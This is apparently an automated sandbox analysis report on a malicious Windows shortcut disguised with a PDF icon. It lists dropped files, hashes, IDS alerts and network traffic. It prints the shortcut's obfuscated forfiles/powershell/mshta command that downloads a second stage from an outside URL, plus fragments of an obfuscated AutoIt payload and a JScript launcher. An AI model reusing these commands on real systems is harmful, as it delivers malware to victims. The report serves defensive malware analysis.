                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8sKDaR7QKw:Qw946cPbiOxDlbYnuRKSjH
                                                                                        MD5:EA5254FE2B0E151D87B6169109D76A97
                                                                                        SHA1:BE9776D58EB4384EA70EF251DAD09116C0841D78
                                                                                        SHA-256:2851568827869DD35CEA43721CE7A4FD2F42C6629081A4995C14B3D30AC9B98F
                                                                                        SHA-512:0CB12BF9577F6588B459DB8E62D0A5714AA4009240DD97B6D361FCA8EC38B80E5F3565EF5A657AB4C9B2D202E3E00EB59D01A9BD7B370B6D0A0681E9277C4918
                                                                                        Malicious:false
                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.8./.1.2./.2.0.2.4. . .1.4.:.5.5.:.4.5. .=.=.=.....
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                        Category:dropped
                                                                                        Size (bytes):16525
                                                                                        Entropy (8bit):5.386483451061953
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                                        MD5:F49CA270724D610D1589E217EA78D6D1
                                                                                        SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                                        SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                                        SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                                        Malicious:false
                                                                                        Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):15114
                                                                                        Entropy (8bit):5.377999400829084
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:v3bScQB+t9eutKovFFtqlLyKKlUW/Vl8jY8WYA2ko7CDNvtjLgfsdedEVIXrTIwj:jFE
                                                                                        MD5:7BC46388622589637F255CEA88F343ED
                                                                                        SHA1:58A341B0E0558839B589019A1AA6C496A4413A78
                                                                                        SHA-256:E9B8693882F2C0EA9DA6834C57EDEAE4F2F3B26BD3A2CC2A2D69D6085465F1D2
                                                                                        SHA-512:388A44D33EFB2B397D3E6AFCE838FD213856ACDA1FABD7106A1C06A00B254796D1EE6F0E135175D4499F6B8B0DE04DC26B30E9D73F98403E41FFA2C21B4364D5
                                                                                        Malicious:false
                                                                                        Preview:SessionID=94f19613-2db3-4219-ba77-63d33693d8fe.1734551737874 Timestamp=2024-12-18T14:55:37:874-0500 ThreadID=7664 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=94f19613-2db3-4219-ba77-63d33693d8fe.1734551737874 Timestamp=2024-12-18T14:55:37:881-0500 ThreadID=7664 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=94f19613-2db3-4219-ba77-63d33693d8fe.1734551737874 Timestamp=2024-12-18T14:55:37:881-0500 ThreadID=7664 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=94f19613-2db3-4219-ba77-63d33693d8fe.1734551737874 Timestamp=2024-12-18T14:55:37:881-0500 ThreadID=7664 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=94f19613-2db3-4219-ba77-63d33693d8fe.1734551737874 Timestamp=2024-12-18T14:55:37:882-0500 ThreadID=7664 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):35721
                                                                                        Entropy (8bit):5.411734085651151
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRC:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRY
                                                                                        MD5:BEE56D9DCCD49C2F6D6CE75E8006AE03
                                                                                        SHA1:D4D8D4D31F240159F2163B7AB83C281972C2B3FB
                                                                                        SHA-256:C47D6F3754C94C712E234816093E1D3CC773644B11C5931EB18AB85086C36F44
                                                                                        SHA-512:A7C86B60E7808860DCF80D803FB7A4BA01EC78DF240C8C1242A90AF0A12A2CED51DFB31F75100504CBF5294B54712B6D1F679BDED3F03AAD7D6E86240FEBD367
                                                                                        Malicious:false
                                                                                        Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                        Category:dropped
                                                                                        Size (bytes):1407294
                                                                                        Entropy (8bit):7.97605879016224
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                        Category:dropped
                                                                                        Size (bytes):386528
                                                                                        Entropy (8bit):7.9736851559892425
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                        Category:dropped
                                                                                        Size (bytes):758601
                                                                                        Entropy (8bit):7.98639316555857
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                        Category:dropped
                                                                                        Size (bytes):1419751
                                                                                        Entropy (8bit):7.976496077007677
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                        MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                                        SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                                        SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                                        SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                                        Malicious:false
                                                                                        Process:C:\Users\Public\Guard.exe
                                                                                        File Type:ASCII text, with very long lines (1266)
                                                                                        Category:dropped
                                                                                        Size (bytes):1244516
                                                                                        Entropy (8bit):5.14211661950074
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:D8V+jcfSRkDQ5a1LYyQyFiI+SE71+KhpL0Wf+EpAlOQd:Dcd7cfr5sWLHfvA
                                                                                        MD5:1639C47BD901955B127D72B16450FDFA
                                                                                        SHA1:7D26B16C3B9883B1F283020896400F052DDEC689
                                                                                        SHA-256:0F0F7ECB51FA024C272A26A17330CCA3D10DAA5320B78971E1CF31CC6BD8F099
                                                                                        SHA-512:B75FBEA45DC3E96B974811EBB90E963C0B58308F80096BCD2BBDA2704CC8E4C39680F68403D3537F0F7FF6E1AF8418749C822A543192D324DACD23FE26D38026
                                                                                        Malicious:false
                                                                                        Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                                        Process:C:\Users\Public\Guard.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):192
                                                                                        Entropy (8bit):4.775086341816013
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:RiMIpGXfeNH5E5wWAX+d4a+kEkD5yKXW/Zi+0/RaMl85uWAX+d4a+kEkD5yKXW/f:RiJbNHCwWD+vkDrXW/Zz0tl8wWD+vkDO
                                                                                        MD5:2BAB60AF26AA89CB37A2AABAC6162E25
                                                                                        SHA1:3D2DD35E294E4B76D2DDAA538076E29653255058
                                                                                        SHA-256:B6D42CD62ACDA7113CBE171A52618CE71EB5CB3B6A255F84C346A145B22CE298
                                                                                        SHA-512:3E29CFAC858B8659107EBD256403126487C5CDDF2DD9FF5BB0C5479281FFFA7983BB84369FC9FE9F1F5EF5DD4C4515DA271456D6DEC19034D9878859B8A3E63C
                                                                                        Malicious:true
                                                                                        Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                                        Process:C:\Users\Public\Guard.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):893608
                                                                                        Entropy (8bit):6.62028134425878
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                        • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                        • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                        • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                        • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                                                        • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                                                        • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                                                                        • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                                                                        • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                                                                        • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1083904
                                                                                        Entropy (8bit):6.306437544300893
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:MrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tvan1y:M2EYTb8atv1orq+pEiSDTj1VyvBa1
                                                                                        MD5:085AE742872C761A3485E075756E4781
                                                                                        SHA1:48EC6AEF243D0922CC595A8F20AF5ABED392D590
                                                                                        SHA-256:67BD9D9B91633B2EAFA5D01365015075C0B86C145C8E17DC019FC5781C667CB0
                                                                                        SHA-512:ED08DD6EA97C88C5D43ADCF597B6BCD6AEB11EF452E13013BB1A59C44E62528F07D16A1E16549B0D2338B21658841A98CCCAEB627EAE0BCB1B97F76B6606C1CA
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):102
                                                                                        Entropy (8bit):4.939404205005729
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:HRAbABGQaFyw3pYo0nacwRE2J5yKXW/Zi+URAAy:HRYF5yjocNwi23yKXW/Zzyy
                                                                                        MD5:A7D40A7BA6D8F0A99F90068D484E33C6
                                                                                        SHA1:FFF7A3AE229FD5FA0E1F8798D3830362F9EAB7F2
                                                                                        SHA-256:D29502D994513542511C29BBC2356913745C26FE6270055DBAFC5CC98D86F123
                                                                                        SHA-512:D1CAE20F0B0F9E39F9CEBAE7A170485440E5D9B3B035A80D9A5F04F76C395ECB5A9625AE4E36CAC6763D75C94181F3EF166D687F3D00270545248A7CC8CC2FE4
                                                                                        Malicious:true
                                                                                        Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PDF document, version 1.3, 3 pages
                                                                                        Category:dropped
                                                                                        Size (bytes):3986
                                                                                        Entropy (8bit):7.456004459274474
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:6RHrsQ6Fc+YDxP8gpOwEBdOujxeB7knVQzWKB5Y+74C0sLJRSo:6trcPYDigiBdfetAMxm8BPRSo
                                                                                        MD5:F1D1BF7BA473B16F95B0BAFE0E09A402
                                                                                        SHA1:33CBC0601595EC233C96D8181D12CEAE9CEECE7A
                                                                                        SHA-256:CFBACCD2CC5E9FCE35F05E87D7F5D8DF85CA47ECF0E8FDC44CFB701A70EB0DFE
                                                                                        SHA-512:559918229442151AF1C1C48D55052BC94BB28E664CE5190B40BF0CE10A3381F1D9773F3FC4E1848CB7A5E34DE4279533E64F667F58F473DB61C824E861CF6F90
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:09:57 2019, mtime=Sun Dec 15 06:39:19 2024, atime=Sat Dec 7 08:09:57 2019, length=41472, window=hidenormalshowminimized
                                                                                        Entropy (8bit):2.630468671046308
                                                                                        TrID:
                                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                                        File name:s4PymYGgSh.lnk
                                                                                        File size:3'068 bytes
                                                                                        MD5:f2d11d2f41fe0c5b667ddc0cdde9b149
                                                                                        SHA1:56401fcd09bc96c694ed3c7dd5ad94733cd747ae
                                                                                        SHA256:8c5195f5d2c6f618d5f98a9f32809b5da490cb1c48512d410c1896695fb4d394
                                                                                        SHA512:dc21371dd82f7b58b095f3de221bf470c47b9ffc0515710e18611ac6aa66a1be332e1ecfca9124bd468a59f02d993770bb254835559b7b2eb0eff5adbc7ce9f1
                                                                                        SSDEEP:24:8WXvfY3tn+pyAMkr+/4W+4MlEPSL6KS2iOHLSHFacabqyI+pu4m:8Wo3CQ/MlEQ6KRi4Gacaey3w4
                                                                                        TLSH:BA51D30422F95B74E3B7AB792879F20289717896DC12DF1E009451C818A5A20FAB5F7B
                                                                                        Icon Hash:74f0e4e4e4e1e1ed

                                                                                        General

                                                                                        Relative Path:..\..\..\Windows\System32\forfiles.exe
                                                                                        Command Line Argument:/p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo
                                                                                        Icon location:C:\Users\Administrator\Downloads\Telegram Desktop\file_type_pdf_icon_130274.ico
                                                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                        2024-12-18T20:55:34.443305+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.7 | 49742 | 147.45.49.155 | 80 | TCP
                                                                                        2024-12-18T20:55:34.713269+0100 | 2833022 | ETPRO MALWARE Possible Malicious Second Stage Download with Terse Headers | 1 | 147.45.49.155 | 80 | 192.168.2.7 | 49742 | TCP
                                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Dec 18, 2024 20:55:26.329140902 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.329178095 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.471415043 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.471443892 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.471510887 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.471538067 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.471555948 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.471642017 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.502782106 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.502808094 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.502923965 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.502945900 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.503000975 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.503525972 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523441076 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.523480892 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.523524046 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523550987 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.523569107 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523602009 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:26.523605108 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523649931 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523961067 CET49716443192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:26.523972988 CET44349716147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:32.063685894 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:32.183228016 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:32.183341026 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:32.184206009 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:32.303775072 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:33.576278925 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:33.576478958 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:33.576525927 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:33.576828957 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:33.576843977 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:33.576937914 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:33.975336075 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.095366001 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.443155050 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.443226099 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.443305016 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.443665028 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.443679094 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.443747044 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.444499016 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.444513083 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.444658041 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.446285963 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.446494102 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.446568966 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.454858065 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.455074072 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.455199957 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.465018988 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.467096090 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.467171907 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.593902111 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.594109058 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.594197989 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.598329067 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.598758936 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.598834038 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.635337114 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.635518074 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.635587931 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.637715101 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.638041019 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.638098001 CET4974280192.168.2.7147.45.49.155
                                                                                        Dec 18, 2024 20:55:34.646305084 CET8049742147.45.49.155192.168.2.7
                                                                                        Dec 18, 2024 20:55:34.646496058 CET8049742147.45.49.155192.168.2.7
